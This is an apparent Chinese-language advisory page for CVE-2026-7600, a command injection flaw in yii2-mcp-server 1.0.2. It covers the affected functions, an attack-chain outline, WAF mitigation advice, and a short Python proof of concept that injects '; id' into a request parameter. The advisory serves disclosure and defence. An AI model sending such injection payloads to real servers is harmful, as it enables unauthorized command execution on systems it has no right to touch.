CVE-2026-7600 CVSS 6.3 中危

CVE-2026-7600 yii2-mcp-server OS命令注入漏洞

披露日期: 2026-05-02

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7600

漏洞类型

操作系统命令注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

ArtMin96 yii2-mcp-server

漏洞概述

ArtMin96 yii2-mcp-server 1.0.2版本存在操作系统命令注入漏洞。该漏洞位于MCP接口组件的src/index.ts文件中，涉及yii_command_help和yii_execute_command函数。由于未对用户输入进行严格过滤，攻击者可远程构造恶意数据执行任意系统命令，从而破坏系统机密性、完整性和可用性。

技术细节

该漏洞源于ArtMin96 yii2-mcp-server在处理MCP接口命令时的不当实现。在src/index.ts文件的特定函数中，应用程序直接将用户可控的输入拼接到底层操作系统命令中，未实施必要的输入清洗或参数化处理。攻击者可以通过发送特制的网络数据包，注入恶意的Shell指令。由于攻击向量为网络且无需用户交互，远程攻击者一旦利用成功，即可在服务器上下文中执行任意代码，获取敏感数据或破坏服务。

攻击链分析

STEP 1

侦察

攻击者识别出目标正在运行ArtMin96 yii2-mcp-server 1.0.2版本，并确定MCP接口暴露在网络上。

STEP 2

构造攻击载荷

攻击者分析漏洞原理，构造包含Shell元字符（如分号或管道符）的恶意输入数据，旨在拼接并执行系统命令。

STEP 3

发送恶意请求

攻击者向yii_command_help或yii_execute_command接口发送包含恶意载荷的HTTP请求。

STEP 4

执行命令与获取权限

服务器后端未过滤输入，直接将载荷传递给系统Shell执行，攻击者从而获得服务器权限并窃取数据或破坏系统。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2026-7600 PoC Example
# Target: ArtMin96 yii2-mcp-server 1.0.2
# Description: OS Command Injection via yii_execute_command

target_url = "http://target-ip:port/api/endpoint"
payload = "; id" # Attempting to execute 'id' command

data = {
    "command": "help",
    "param": payload  # Injecting payload into vulnerable parameter
}

try:
    response = requests.post(target_url, json=data)
    print(f"Status Code: {response.status_code}")
    print(f"Response Body: {response.text}")
    # Check if command execution was successful (e.g., finding 'uid' in response)
    if "uid" in response.text:
        print("[+] Exploit successful! Command executed.")
    else:
        print("[-] Exploit failed or target not vulnerable.")
except Exception as e:
    print(f"Error: {e}")

影响范围

ArtMin96 yii2-mcp-server 1.0.2

防御指南

临时缓解措施

建议立即限制受影响应用的网络访问，仅允许可信IP连接。同时，在Web应用防火墙（WAF）中添加规则，拦截包含常见命令注入特征（如; | & ` $()）的流量，直至官方补丁发布并完成部署。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7600
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7600
3 Details https://www.cvedetails.com/cve/CVE-2026-7600/
4 VulDB https://vuldb.com/cve/CVE-2026-7600
5 Link https://github.com/ArtMin96/yii2-mcp-server/
6 Link https://github.com/ArtMin96/yii2-mcp-server/issues/3
7 Link https://github.com/BruceJqs/public_exp/issues/29
8 Link https://vuldb.com/submit/805613
9 Link https://vuldb.com/vuln/360557
10 Link https://vuldb.com/vuln/360557/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表